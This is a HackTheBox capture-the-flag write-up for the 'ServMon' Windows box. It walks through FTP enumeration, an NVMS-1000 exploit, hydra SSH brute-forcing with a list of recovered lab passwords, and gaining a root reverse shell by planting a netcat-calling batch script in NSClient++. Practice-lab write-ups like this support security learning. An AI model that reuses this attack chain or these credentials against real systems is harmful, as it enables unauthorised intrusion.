ServMon Writeup — HackTheBox
Made by RebornSec ®
This box is windows based box made up by dmw0ng that needs to enumerate every part of the box to gain access to our user using a vulnerability in NVMS-1000 and then building our malicious code to access to root. Enjoy !
Enumeration phase :
As usual let’s start with the Nmap scan :
[~] Nmap -sC -sV 10.10.10.184
Checking FTP (53) using anonymous login we found some good hints :
Nadine directory contains good information about where the password is located :
Nathan directory gives us some notes about the updates that needs to manage :
Checking the login page (80) we notice that we can’t access it using usual login credentials or either SQL injection :
But we notice that this login page is build using Management System Login NVMS-1000 let’s try to find an exploit for it :
let’s check the first exploit :
Using burp suite to exploit the vulnerability :
I found some credentials :
These hashes are found :
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
Let’s try them out with our couple users :
Nadine
Nathan
To do so i used hydra to check ssh login using both files users.txt and cryptedCreds.txt :
New ssh login credential found :
Nadine:L1k3B1gBut7s@W0rk
Let’s try to login to our user Nadine :
And we got our user.txt :)
Root phase :
On my way to check a way to gain root access i checked if i can access to the user Nathan :
Access is denied appeared, i checked also whoami /all for some privileges :
Nothing appears suspicious, digging on the files i found windows agent super vision NSClient++ can access to the host password :
admin:ew2x6SsGTxjRwXOT
Using the documentation of NSClient++ i figure out a way to get shell :
Now check on which port NSClient service is running :
And seems it’s running on port 8443, it’s time to make our malicious script.
Let’s upload our script.bat and nc.exe first into Temp directory :
Firing our server apache2 and start uploading :
Open other terminal and start listening :
[~] nc -nlvp 443
We add our script rebornsec.bat to the list of the system scripts and executing it :
And we got a shell :
Congratulation we got our root.txt :
Long road box but full of new things to learn :) Thanks again HackTheBox for this amazing box.